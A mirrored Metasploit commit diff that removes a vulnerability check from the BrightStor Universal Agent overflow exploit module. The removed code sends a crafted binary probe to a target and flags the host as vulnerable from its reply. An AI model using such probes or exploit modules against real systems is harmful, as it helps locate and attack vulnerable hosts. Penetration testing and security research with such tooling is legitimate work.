1
mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

Woops, tenable-license check blob

git-svn-id: file:///home/svn/incoming/trunk@3595 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2006-04-13 16:13:48 +00:00
parent 4b9033be00
commit ca72b7e2ed

View File

@ -52,26 +52,6 @@ class Exploits::Windows::Brightstor::BrightstorUniversalAgentOverflow < Msf::Exp
], self.class) ], self.class)
end end
def check
connect
probe = "\x00\x00\x00\x00\x03\x20\xbc\x02" +
("2" * 256) +
("A" * 32) +
"\x0B\x11\x0B\x0F\x03\x0E\x09\x0B" +
"\x16\x11\x14\x10\x11\x04\x03\x1C" +
"\x11\x1C\x15\x01\x00\x06" +
("X" * 390)
sock.put(probe)
resp = sock.get_once
disconnect
if (resp and resp == "\x00\x00\x73\x02\x32\x32\x00\x00")
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit def exploit
print_status("Trying target #{target.name}...") print_status("Trying target #{target.name}...")